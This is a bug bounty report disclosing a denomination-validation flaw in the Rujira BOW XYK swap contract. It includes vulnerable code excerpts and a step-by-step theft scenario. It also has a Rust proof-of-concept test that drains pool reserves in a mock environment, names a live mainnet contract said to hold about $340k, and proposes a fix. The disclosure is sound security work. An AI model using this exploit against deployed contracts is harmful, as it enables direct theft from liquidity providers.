### ISSUE TITLE
BOW XYK Swap Allows Denomination Confusion Leading to Direct Pool Asset Theft

### ISSUE THREAD

**Issue by c4-bot-6** [code-423n4/rujira-bug-bounty#18]
# Lines of code

https://gitlab.com/thorchain/rujira/-/blob/main/packages/rujira-rs/src/interfaces/bow/xyk.rs#L157-195
https://gitlab.com/thorchain/rujira/-/blob/main/contracts/rujira-bow/src/contract.rs#L40-77

# Vulnerability details

## Summary

The BOW XYK swap implementation fails to validate that the requested output denomination matches the actual asset returned by the swap calculation.  
Because denomination validation is missing, an attacker can request payment in an arbitrary denomination while the protocol only checks numeric amounts.

This allows direct theft of pool reserves by exploiting pools with unequal price ratios, resulting in deterministic and repeatable loss of funds.

---

### Location 1: Swap Validation Logic

**File:** `packages/rujira-rs/src/interfaces/bow/xyk.rs`  
**Lines:** 157–195

The `Xyk::validate_swap()` function validates only numeric amounts and never verifies that the requested output denomination (`ask.denom`) matches the expected swap output asset.

Relevant excerpt:

```rust
let return_amount_total = state.swap(&offer.amount)?;
let fee_amount = return_amount_total.multiply_ratio(
    self.fee.numerator(),
    self.fee.denominator()
);
let return_amount = return_amount_total.sub(fee_amount);

// Only amount is checked, denomination is ignored
ensure!(
    return_amount >= ask.amount,
    StrategyError::InsufficientReturn {
        expected: ask.clone(),
        returned: coin(return_amount.u128(), ask.denom),
    }
);
```

At no point does the function enforce that `ask.denom` equals the pool's output asset.

### Location 2: Blind Transfer of User-Supplied Denomination

**File:** `contracts/rujira-bow/src/contract.rs`  
**Lines:** 40–77

After validation, the contract blindly transfers the user-supplied `min_return` coin using `BankMsg::Send`:

```rust
Ok(Response::default()
    .add_message(CosmosMsg::Bank(BankMsg::Send {
        to_address: to_address.to_string(),
        amount: vec![min_return],
    }))
    .add_event(event))
```

This means whatever denomination was supplied in `min_return` is sent directly from the pool balance without verification.

---

### Direct Theft of Pool Reserves

An attacker can extract the more valuable asset from the pool at an arbitrary rate.

### Concrete Attack Scenario

Assume a pool with the following state:

- **Pool assets:** 1000 RUJI + 5000 USDC
- **Effective price ratio:** 1 RUJI ≈ 5 USDC
- **Swap fee:** 0.30%

**Attack steps:**

1. Attacker sends 1 RUJI to the pool.
2. Internally, the swap calculation computes ~4.985 USDC as output.
3. Attacker sets:
   ```
   min_return = 4 RUJI
   ```
4. Validation passes because:
   ```
   4.985 >= 4
   ```
5. Contract transfers 4 RUJI instead of ~4.985 USDC.

**Result:**

- Attacker pays: 1 RUJI
- Attacker receives: 4 RUJI
- Net attacker profit: +3 RUJI
- Net pool loss: −3 RUJI

This attack:

- Requires no special permissions
- Is repeatable
- Works on any XYK pool with unequal ratios
- Can drain the pool until reserves are exhausted

---

## Proof of Concept

Add this test to `contracts/rujira-bow/src/contract.rs`:
```rust
#[test]
fn test_swap_denom_confusion_theft() {
    use cosmwasm_std::{coin, Decimal, Uint128};
    use cw_multi_test::{ContractWrapper, Executor};
    use rujira_rs::bow::{ExecuteMsg, InstantiateMsg, Strategies, Xyk};
    use rujira_rs::TokenMetadata;
    use rujira_rs_testing::mock_rujira_app;

    let mut app = mock_rujira_app();

    // Deploy BOW
    let owner = app.api().addr_make("owner");
    let bow_code = Box::new(ContractWrapper::new(
        crate::contract::execute,
        crate::contract::instantiate,
        crate::contract::query,
    ));
    let bow_code_id = app.store_code(bow_code);

    // XYK: ruji (x) / usdc (y)
    let bow = app
        .instantiate_contract(
            bow_code_id,
            owner,
            &InstantiateMsg {
                metadata: TokenMetadata {
                    description: "LP RUJI-USDC".to_string(),
                    display: "LP RUJI-USDC".to_string(),
                    name: "LP RUJI-USDC".to_string(),
                    symbol: "LP/RUJI-USDC".to_string(),
                    uri: None,
                    uri_hash: None,
                },
                strategy: Strategies::Xyk(Xyk::new(
                    "ruji".to_string(),
                    "usdc".to_string(),
                    Decimal::bps(10),   // step
                    Uint128::new(1000), // min_quote
                    Decimal::bps(30),   // fee
                )),
            },
            &[],
            "bow",
            None,
        )
        .unwrap();

    // Seed liquidity
    let lp_provider = app.api().addr_make("lp");
    app.init_modules(|router, _api, storage| {
        router.bank.init_balance(
            storage,
            &lp_provider,
            vec![coin(1000, "ruji"), coin(5000, "usdc")],
        )
    })
    .unwrap();

    app.execute_contract(
        lp_provider,
        bow.clone(),
        &ExecuteMsg::Deposit {
            min_return: None,
            callback: None,
        },
        &[coin(1000, "ruji"), coin(5000, "usdc")],
    )
    .unwrap();

    // Attacker setup
    let attacker = app.api().addr_make("attacker");
    app.init_modules(|router, _api, storage| {
        router
            .bank
            .init_balance(storage, &attacker, vec![coin(10, "ruji")])
    })
    .unwrap();

    let before_attacker_ruji = app
        .wrap()
        .query_balance(attacker.clone(), "ruji")
        .unwrap()
        .amount;
    let before_pool_ruji = app.wrap().query_balance(bow.clone(), "ruji").unwrap().amount;

    println!("Before attacker ruji: {}", before_attacker_ruji);
    println!("Before pool ruji: {}", before_pool_ruji);

    // Exploit: request wrong denom for min_return
    app.execute_contract(
        attacker.clone(),
        bow.clone(),
        &ExecuteMsg::Swap {
            min_return: coin(4, "ruji"),
            to: None,
            callback: None,
        },
        &[coin(1, "ruji")],
    )
    .unwrap();

    let after_attacker_ruji = app
        .wrap()
        .query_balance(attacker.clone(), "ruji")
        .unwrap()
        .amount;
    let after_pool_ruji = app.wrap().query_balance(bow.clone(), "ruji").unwrap().amount;

    println!("After attacker ruji: {}", after_attacker_ruji);
    println!("After pool ruji: {}", after_pool_ruji);

    let attacker_profit = after_attacker_ruji.saturating_sub(before_attacker_ruji.saturating_sub(Uint128::new(1)));
    let pool_loss = before_pool_ruji.saturating_sub(after_pool_ruji);

    println!("Attacker profit (ruji): {}", attacker_profit);
    println!("Pool loss (ruji): {}", pool_loss);

    // Attacker paid 1 ruji, received 4 ruji => net +3 ruji
    assert_eq!(
        after_attacker_ruji,
        before_attacker_ruji - Uint128::new(1) + Uint128::new(4)
    );

    // Pool sent 4 ruji but received 1 ruji offer => net -3 ruji
    assert_eq!(after_pool_ruji, before_pool_ruji - Uint128::new(3));
}
```

### How to Run

```bash
cargo test -p rujira-bow test_swap_denom_confusion_theft --features mock -- --nocapture
```

---

## Mainnet Exposure

A deployed BOW XYK pool using the same code path is currently live on mainnet:

**Contract Address:**  
`thor1g97844v7wuvz58m6p3vqp3u28nxaglqsag4dte2wrrry7sge9llq0t5tav`

**Status:** Active (recent execute transactions)

**Assets Held:** Approximately $340k

**Explorer:**  
https://thorchain.net/address/thor1g97844v7wuvz58m6p3vqp3u28nxaglqsag4dte2wrrry7sge9llq0t5tav

Because the deployed contract uses the same swap logic, these funds would be at risk if the demonstrated attack were executed.

**No mainnet exploitation was performed.**

---

## Recommended Fix

Enforce strict denomination validation in `Xyk::validate_swap()`:

```rust
let expected_output = if offer.denom == self.x {
    &self.y
} else if offer.denom == self.y {
    &self.x
} else {
    return Err(StrategyError::InvalidInputDenom);
};

ensure!(
    ask.denom == *expected_output,
    StrategyError::InvalidOutputDenom
);
```

This ensures the requested output denomination always matches the actual swap output asset.

---

## Severity Justification

This issue allows:

- Direct theft of pool reserves
- No permissions required
- Single-transaction execution
- Repeatable exploitation
- Loss bounded only by pool liquidity
